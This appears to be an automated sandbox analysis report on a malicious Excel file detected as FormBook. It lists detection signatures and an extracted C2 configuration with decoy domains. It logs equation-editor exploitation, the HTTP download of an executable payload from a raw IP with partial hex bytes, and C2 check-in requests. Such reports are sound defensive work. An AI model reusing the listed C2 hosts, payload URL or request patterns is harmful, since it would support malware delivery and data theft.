Analysis Report Processed APR12.xlsx

Overview

General Information

Sample Name: Processed APR12.xlsx
Analysis ID: 385456
MD5: c41fd90fc1e23885a1e075ce11d612e8
SHA1: d1903963f15c001baceb7c0e92998bc38a19f318
SHA256: 9328d5dcf7664d4a92915ba032a183e63ef8602445737f42bf4d479b8037e1c2
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe ReversingLabs: Detection: 41%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 41%
Multi AV Scanner detection for submitted file
Source: Processed APR12.xlsx ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.vbc.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00D0AEB8
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop edi 5_2_00416282
Source: C:\Users\Public\vbc.exe Code function: 4x nop then pop ebx 5_2_00406A94
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop edi 7_2_00116282
Source: C:\Windows\SysWOW64\help.exe Code function: 4x nop then pop ebx 7_2_00106A95
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.centergolosinas.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 3.125.17.227:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49168 -> 192.169.223.13:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 198.54.126.105:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.adultpeace.com/p2io/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 12 Apr 2021 12:45:15 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7Last-Modified: Sun, 11 Apr 2021 17:55:36 GMTETag: "ccc00-5bfb61ab42963"Accept-Ranges: bytesContent-Length: 838656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 60 33 73 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 c0 0c 00 00 0a 00 00 00 00 00 00 8e de 0c 00 00 20 00 00 00 e0 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 de 0c 00 57 00 00 00 00 e0 0c 00 50 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 be 0c 00 00 20 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 06 00 00 00 e0 0c 00 00 08 00 00 00 c2 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0d 00 00 02 00 00 00 ca 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 de 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 30 eb 09 00 04 f3 02 00 03 00 00 00 39 00 00 06 88 e0 02 00 a8 0a 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 71 1b 41 9f 31 e7 6f 65 3c bb 46 1b 41 0f 49 b5 18 12 b8 72 9c a0 37 51 c8 e2 0c 6a af 4a c5 42 5f 7d b2 21 e8 e0 b7 1f 27 21 bf 50 12 e1 aa 5b 38 f1 bb 20 a9 83 e0 53 b7 5d 97 d8 c1 ef 04 c6 e2 95 84 5a 7d 51 f8 c4 36 e1 9b bf 12 6f 85 4a bb e4 9e 11 e3 ca 3e 23 03 a9 9e 06 37 84 bf 35 4d 22 ca 57 c5 aa fb 0e 06 c3 05 e7 ba 9e 39 5e 62 43 f5 0f 09 cf fb 22 01 d1 63 0a 1e 40 6c 40 3d a5 d3 35 57 2c f0 9f 1c 47 8c aa 66 f8 bb 67 6d 89 a3 4c 5a a2 78 aa 72 8b 84 c4 2f 3d 86 de 51 81 11 a3 9f ab f7 59 24 2d c9 0a 94 65 5f 16 76 61 09 37 60 d4 78 05 09 aa 44 ab f4 aa fa 0b 9b 0f 46 30 b0 06 e1 81 11 0f 2a 4a b6 5e d6 f2 ee 25 bf 2b 52 03 db 92 85 49 b4 d8 69 08 fa 6f b5 69 f3 6a 8b f7 3a 5e d2 ff ee 37 bc 54 23 85 c6 d5 00 1b b6 5a b6 de 81 49 c5 2f ec 3b c6 3c e7 c2 c7 db 35 e5 95 67 15 d0 5c 62 e7 29 5a a4 42 77 09 88 c0 6a d2 5c 2a cc fe 38 7b 70 a9 5b 28 e4 2f a1 c8 bb 2e 08
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.shopihy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View IP Address: 23.82.57.32 23.82.57.32
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View ASN Name: LEASEWEB-USA-SFO-12US LEASEWEB-USA-SFO-12US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /winme/xles.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.125.17.227Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: unknown TCP traffic detected without corresponding DNS query: 3.125.17.227
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C627CB57.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /winme/xles.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 3.125.17.227Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=r2GsjHfDgbadIobDkfqM84hqAY3LnZYXU2evLvxsfUtrrcQFCKudTBmZizgvXIWWwk1k1Q==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.centergolosinas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=RfOK6jKkDjXJwasAc5LTyAppaXreGCTFIzs53vHZyU46XfbA28pKG07a1ZehGkxvOhkisQ==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=WkKybY+BW5ZBczdH4hKPcEEM/Z4gp4PnllJ4lZDhA9T5haocRpsPFf0I2LnXqOHPzeGA4A==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.ruhexuangou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=H0m9fF/8FL7QqYEOA4653EpAABAppk+gPA36EdDaEoCMlE2zCVYj51CG+i/1QazvQuiVHw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.dreamcashbuyers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /p2io/?oN6xpP=Ei6RqbmoUXtm0NxuUyb/BZtLNDk4B448l51n8Zz8P/g/u3IBdZc5bEJpDCmkA548du9Vog==&NreTZ=JJE0B4uP-Jd HTTP/1.1Host: www.shopihy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.centergolosinas.com
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2219748309.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2204196235.0000000004B50000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2220023797.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
